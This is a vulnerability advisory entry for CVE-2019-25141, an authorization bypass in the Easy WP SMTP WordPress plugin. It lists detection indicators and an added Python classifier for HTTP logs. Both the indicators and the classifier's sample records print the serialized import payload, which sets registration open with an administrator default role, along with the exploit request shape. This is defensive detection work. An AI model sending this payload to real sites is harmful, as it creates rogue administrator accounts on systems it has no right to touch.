CVE-2019-25141
published 2023-06-07


Priority: P183, critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Flags: ITW, Exploit, VulnCheck KEV
Exploited in the wild
EPSS: 4.46% (90.2nd percentile)
The Easy WP SMTP plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.3.9. This is due to missing capability checks on the admin_init() function, in addition to insufficient input validation. This makes it possible for unauthenticated attackers to modify the plugin's settings and arbitrary options on the site, which can be used to inject new administrative user accounts.

Affected

1 range

Vendor         Product        Version range   Fixed in
wp-ecommerce   easy_wp_smtp   <= 1.3.9

Detection & IOCs (extracted from sources)

url:      /wp-admin/admin-ajax.php
path:     /wp-content/plugins/easy-wp-smtp/
command:  action=swpsmtp_clear_log
command:  swpsmtp_import_settings=1
other:    a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}
  • Look for multipart upload of a .txt file via the swpsmtp_import_settings_file field containing a PHP serialized payload with users_can_register=1 and default_role=administrator, indicating an attempt to create a rogue admin account.
  • A successful exploitation results in an HTTP 302 redirect to options-general.php?page=swpsmtp_settings; monitor for this response pattern following unauthenticated admin-ajax.php POSTs.
  • Presence of the Easy WP SMTP plugin path in web server logs or HTTP responses can identify vulnerable targets.
  • The vulnerability affects Easy WP SMTP versions up to and including 1.3.9; version 1.4.0 and later are patched. Ensure version checks are scoped accordingly.
  • The exploit payload uses a known static MD5 checksum (3ce5fb6d7b1dbd6252f4b5b3526650c8) embedded in the serialized import file; this checksum may be used as a static signature but could be trivially altered by an attacker.
  • The Nuclei template is marked 'intrusive' — running this detection probe will actively attempt to modify WordPress site options and should only be used in authorized testing environments.
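The IOC list above describes the request and response pattern a defender should look for; the following is an added example (not code from the advisory, the plugin, or the Nuclei template) that turns those indicators into a classifier over HTTP transaction records. It assumes each transaction is available as a dict with method, path, cookies, body, status and location (any proxy or WAF log that exposes those fields can be mapped onto this shape), treats a wordpress_logged_in_* cookie as the sign of an authenticated session, and uses a deliberately small multipart parser. The sample records are constructed for illustration; the serialized payload and checksum are the ones quoted in the IOC list.

```python
"""Classify HTTP transactions against the CVE-2019-25141 IOCs (added example)."""
import re
from urllib.parse import parse_qs, urlparse

AJAX_PATH = "/wp-admin/admin-ajax.php"
PLUGIN_PATH = "/wp-content/plugins/easy-wp-smtp/"
REDIRECT_TARGET = "options-general.php?page=swpsmtp_settings"
STATIC_CHECKSUM = "3ce5fb6d7b1dbd6252f4b5b3526650c8"  # weak signature: attacker-controlled
FIXED_VERSION = (1, 4, 0)  # 1.4.0 and later are patched

# Fragments of the PHP-serialized option set from the IOC list.
REGISTER_RE = re.compile(r's:18:"users_can_register";s:1:"1"')
ROLE_RE = re.compile(r's:12:"default_role";s:13:"administrator"')
UPLOAD_RE = re.compile(r'name="swpsmtp_import_settings_file"; filename="[^"]*\.txt"')


def is_vulnerable_version(version):
    """True for Easy WP SMTP versions up to and including 1.3.9."""
    parts = tuple(int(p) for p in version.split("."))
    parts = parts + (0,) * (3 - len(parts))
    return parts < FIXED_VERSION


def is_authenticated(rec):
    """Heuristic (assumption): a logged-in WordPress session carries this cookie."""
    return any(c.startswith("wordpress_logged_in_") for c in rec.get("cookies", ()))


def form_values(body, name):
    """Values of form field `name` from a urlencoded or multipart body (toy parser, CRLF only)."""
    if body.startswith("--"):
        pat = (r'name="%s"(?:; filename="[^"]*")?\r\n(?:[^\r\n]+\r\n)*\r\n(.*?)\r\n--'
               % re.escape(name))
        return re.findall(pat, body, re.S)
    return parse_qs(body).get(name, [])


def classify(rec):
    """Return IOC tags for one transaction; an empty list means nothing of interest."""
    tags = []
    parsed = urlparse(rec["path"])
    body = rec.get("body", "")
    if parsed.path.startswith(PLUGIN_PATH):
        return ["plugin-path-probe"]  # plugin presence being checked
    if parsed.path != AJAX_PATH or rec["method"] != "POST":
        return tags
    actions = parse_qs(parsed.query).get("action", []) + form_values(body, "action")
    if "swpsmtp_clear_log" in actions:
        tags.append("swpsmtp-clear-log")
    if "1" in form_values(body, "swpsmtp_import_settings"):
        tags.append("import-settings")
    if UPLOAD_RE.search(body):
        tags.append("txt-upload")
    if REGISTER_RE.search(body) and ROLE_RE.search(body):
        tags.append("rogue-admin-options")
    if STATIC_CHECKSUM in body:
        tags.append("static-checksum")
    if rec.get("status") == 302 and REDIRECT_TARGET in rec.get("location", ""):
        tags.append("settings-redirect")
    if tags and not is_authenticated(rec):
        tags.append("unauthenticated")
    return tags


def is_exploit_attempt(tags):
    """High confidence: an unauthenticated import carrying the rogue-admin option set."""
    return "unauthenticated" in tags and "rogue-admin-options" in tags


# Constructed sample transactions (not captured traffic).
PAYLOAD = ('a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";'
           's:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"'
           + STATIC_CHECKSUM + '";}')
SAMPLE_RECORDS = [
    {"method": "POST", "path": "/wp-admin/admin-ajax.php?action=swpsmtp_clear_log",
     "cookies": [],
     "body": ('--x\r\nContent-Disposition: form-data; name="swpsmtp_import_settings"\r\n\r\n1\r\n'
              '--x\r\nContent-Disposition: form-data; name="swpsmtp_import_settings_file"; '
              'filename="settings.txt"\r\n\r\n' + PAYLOAD + '\r\n--x--'),
     "status": 302, "location": "/wp-admin/options-general.php?page=swpsmtp_settings"},
    {"method": "POST", "path": "/wp-admin/admin-ajax.php",
     "cookies": ["wordpress_logged_in_abc=editor|constructed"],
     "body": "action=heartbeat&_nonce=deadbeef", "status": 200, "location": ""},
    {"method": "GET", "path": "/wp-content/plugins/easy-wp-smtp/readme.txt",
     "cookies": [], "body": "", "status": 200, "location": ""},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        tags = classify(rec)
        print(rec["method"], rec["path"], tags, "EXPLOIT" if is_exploit_attempt(tags) else "")
```

The tags are kept separate rather than collapsed into one verdict so that the weak indicators (the static checksum, the plugin path probe, a lone swpsmtp_clear_log action) can be weighted differently from the combination that actually matters: an unauthenticated POST carrying users_can_register=1 and default_role=administrator, followed by the 302 to the settings page.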

CVSS provenance

NVD        v3.1   9.8   CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck         9.8   CRITICAL